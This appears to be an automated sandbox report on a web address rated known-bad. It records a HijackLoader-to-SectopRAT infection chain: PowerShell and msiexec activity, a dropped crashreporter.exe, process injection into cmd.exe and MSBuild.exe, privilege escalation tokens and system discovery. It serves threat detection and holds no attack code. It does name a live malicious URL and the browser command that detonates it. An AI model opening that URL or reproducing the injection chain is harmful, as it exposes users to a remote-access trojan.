Malware Analysis Report

2025-04-14 08:02

Sample ID 250312-2l6leaxkv6
Target http://cac-ltd.ca/
Tags
hijackloader sectoprat discovery execution loader rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://cac-ltd.ca/ was found to be: Known bad.

Malicious Activity Summary

hijackloader sectoprat discovery execution loader rat trojan

Hijackloader family

SectopRAT payload

Sectoprat family

SectopRAT

HijackLoader

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-12 22:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-12 22:41

Reported

2025-03-12 22:46

Platform

win10v2004-20250217-en

Max time kernel

293s

Max time network

294s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://cac-ltd.ca/

Signatures

HijackLoader

loader hijackloader

Hijackloader family

hijackloader

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4044 set thread context of 3448 N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe C:\Windows\SysWOW64\cmd.exe
PID 3448 set thread context of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4312 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 3860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 3860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
